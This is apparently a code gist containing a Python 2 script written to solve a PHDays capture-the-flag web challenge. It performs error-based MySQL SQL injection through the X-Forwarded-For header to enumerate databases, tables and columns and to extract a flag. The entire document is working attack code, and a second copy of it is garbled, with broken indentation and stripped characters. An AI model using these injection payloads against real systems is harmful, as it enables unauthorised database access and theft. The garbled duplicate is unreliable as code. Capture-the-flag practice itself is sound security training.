0x90/gist:4348565

## gistfile1.py
#!/bin/env python
import httplib,urllib
from urlparse import urlparse
from time import sleep

TARGET_URL = 'http://ctf.phdays.com:1411/news/1/add-comment'

def inject_query(query):
    sleep(1)
    parsed = urlparse(TARGET_URL)
    conn = httplib.HTTPConnection(parsed.netloc)
    headers = {"X-Forwarded-For": "1'and %s and '1'='1" % query}
    conn.request('GET', '%s' % parsed.path, headers=headers)
    resp = conn.getresponse()
    print "STATUS: %s" % resp.status
    html = resp.read()
    if resp.status == 302:
        return html
    else:
        return html.split('<strong>')[1].split('</div>')[0]

def get_mysql_version():
    query ="row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2)) x from (select 1 union select 2)a group by x limit 1)"
    return inject_query(query)#.split(":")[1]

def get_current_database():
    query ="(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    return inject_query(query).split('~')[1].replace("'","").decode('hex')

def current_user():
    query ="(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    return inject_query(query).split('~')[1].replace("'","").decode('hex')

def get_databases():
    i = 1
    databases = ()
    while True:
        query = "(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT %i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" % i
        res = inject_query(query)
        if res == '':
            break
        else:
            databases += (res.split('~')[1].replace("'","").decode('hex'),)
            i+=1
    return databases

def get_tables(db):
    i = 0
    dbname_hex = db.encode('hex')
    tables = ()
    while True:
        query = "(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x%s limit %i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" % (dbname_hex,i)
        res = inject_query(query)
        if res == '':
            break
        else:
            tables += (res.split('~')[1].replace("'","").decode('hex'),)
            i+=1
    return tables

def get_column_names(db,table):
    i = 0
    columns = ()
    while True:
        query = "(select 1 from(select count(*),concat((select (select (" \
                "SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) " \
                "FROM information_schema.columns Where table_schema=0x%s AND table_name=0x%s limit %i,1)) " \
                "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" % (db.encode('hex'),table.encode('hex'),i)
        res = inject_query(query)
        if res == '':
            break
        else:
            columns += (res.split('~')[1].replace("'","").decode('hex'),)
            i+=1
    return columns

def get_records_count(db,table):
    query = "(select 1 from(select count(*),concat((select (select " \
            "(SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `%s`.%s))"\
     "from information_schema.tables limit 0,1),floor(rand(0)*2))x " \
            "from information_schema.tables group by x)a)" % (db,table)
    return inject_query(query).split('~')[1].replace("'","")

def fetch_record(db,table,column,row):
    query = "(select 1 from(select count(*),concat((select (select " \
            "(SELECT concat(0x7e,0x27,Hex(cast(%s.%s as char)),0x27,0x7e) " \
            "FROM `%s`.%s LIMIT %i,1) ) from information_schema.tables limit 0,1)," \
            "floor(rand(0)*2))x from information_schema.tables group by x)a)" % (table,column,db,table,row)
    return inject_query(query) #.split('~')[1].replace("'","")

def get_flag():
    result = ""
    parsed = urlparse(TARGET_URL)
    conn = httplib.HTTPConnection(parsed.netloc)
    for i in xrange(0,64):
        headers = {"X-Forwarded-For": "'and (select 1 from(select count(*),concat((concat(char(126),(select ascii(substring(flag,%i,1)) from web.flags limit 0,1),char(126))),floor(rand(0)*2))x from information_schema.tables group by x)a) and '" % (i,)}
        conn.request('GET', '%s' % parsed.path, headers=headers)
        resp = conn.getresponse()

        html = resp.read()
        #sleep(1)
        if resp.status == 500:
            num = int(html.split('~')[1])
            result += chr(num)
            print "%i => %i : %x: %c"%(i, num, num, chr(num))
        else:
            print "STATUS: %s" % resp.status
    return result

def dump_all():
    #print "Version: %s Database: %s User: %s" % (mysql_version(),current_database(),current_user())
    databases = get_databases()
    for db in databases:
        for table in get_tables(db):
            print "%s.%s" % (db,table)
            columns = get_column_names(db,table)
            print columns
            print get_records_count(db,table)


if __name__ == "__main__":
    #94bd6136818878b5dd97d3a231a97649

    nums =  get_flag()
    print nums
    #for num in nums:
        #print num.enc
    #fetch_record('web','flags','flag',1)
	#!/bin/env python
	import httplib,urllib
	from urlparse import urlparse
	from time import sleep

	TARGET_URL = 'http://ctf.phdays.com:1411/news/1/add-comment'

	def inject_query(query):
	sleep(1)
	parsed = urlparse(TARGET_URL)
	conn = httplib.HTTPConnection(parsed.netloc)
	headers = {"X-Forwarded-For": "1'and %s and '1'='1" % query}
	conn.request('GET', '%s' % parsed.path, headers=headers)
	resp = conn.getresponse()
	print "STATUS: %s" % resp.status
	html = resp.read()
	if resp.status == 302:
	return html
	else:
	return html.split('<strong>')[1].split('</div>')[0]

	def get_mysql_version():
	query ="row(1,1)>(select count(),concat(version(),0x3a,floor(rand()2)) x from (select 1 union select 2)a group by x limit 1)"
	return inject_query(query)#.split(":")[1]

	def get_current_database():
	query ="(select 1 from(select count(),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)"
	return inject_query(query).split('~')[1].replace("'","").decode('hex')

	def current_user():
	query ="(select 1 from(select count(),concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)"
	return inject_query(query).split('~')[1].replace("'","").decode('hex')

	def get_databases():
	i = 1
	databases = ()
	while True:
	query = "(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT %i,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)" % i
	res = inject_query(query)
	if res == '':
	break
	else:
	databases += (res.split('~')[1].replace("'","").decode('hex'),)
	i+=1
	return databases

	def get_tables(db):
	i = 0
	dbname_hex = db.encode('hex')
	tables = ()
	while True:
	query = "(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0x%s limit %i,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)" % (dbname_hex,i)
	res = inject_query(query)
	if res == '':
	break
	else:
	tables += (res.split('~')[1].replace("'","").decode('hex'),)
	i+=1
	return tables

	def get_column_names(db,table):
	i = 0
	columns = ()
	while True:
	query = "(select 1 from(select count(*),concat((select (select (" \
	"SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) " \
	"FROM information_schema.columns Where table_schema=0x%s AND table_name=0x%s limit %i,1)) " \
	"from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" % (db.encode('hex'),table.encode('hex'),i)
	res = inject_query(query)
	if res == '':
	break
	else:
	columns += (res.split('~')[1].replace("'","").decode('hex'),)
	i+=1
	return columns

	def get_records_count(db,table):
	query = "(select 1 from(select count(*),concat((select (select " \
	"(SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `%s`.%s))"\
	"from information_schema.tables limit 0,1),floor(rand(0)*2))x " \
	"from information_schema.tables group by x)a)" % (db,table)
	return inject_query(query).split('~')[1].replace("'","")

	def fetch_record(db,table,column,row):
	query = "(select 1 from(select count(*),concat((select (select " \
	"(SELECT concat(0x7e,0x27,Hex(cast(%s.%s as char)),0x27,0x7e) " \
	"FROM `%s`.%s LIMIT %i,1) ) from information_schema.tables limit 0,1)," \
	"floor(rand(0)*2))x from information_schema.tables group by x)a)" % (table,column,db,table,row)
	return inject_query(query) #.split('~')[1].replace("'","")

	def get_flag():
	result = ""
	parsed = urlparse(TARGET_URL)
	conn = httplib.HTTPConnection(parsed.netloc)
	for i in xrange(0,64):
	headers = {"X-Forwarded-For": "'and (select 1 from(select count(),concat((concat(char(126),(select ascii(substring(flag,%i,1)) from web.flags limit 0,1),char(126))),floor(rand(0)2))x from information_schema.tables group by x)a) and '" % (i,)}
	conn.request('GET', '%s' % parsed.path, headers=headers)
	resp = conn.getresponse()

	html = resp.read()
	#sleep(1)
	if resp.status == 500:
	num = int(html.split('~')[1])
	result += chr(num)
	print "%i => %i : %x: %c"%(i, num, num, chr(num))
	else:
	print "STATUS: %s" % resp.status
	return result

	def dump_all():
	#print "Version: %s Database: %s User: %s" % (mysql_version(),current_database(),current_user())
	databases = get_databases()
	for db in databases:
	for table in get_tables(db):
	print "%s.%s" % (db,table)
	columns = get_column_names(db,table)
	print columns
	print get_records_count(db,table)


	if __name__ == "__main__":
	#94bd6136818878b5dd97d3a231a97649

	nums = get_flag()
	print nums
	#for num in nums:
	#print num.enc
	#fetch_record('web','flags','flag',1)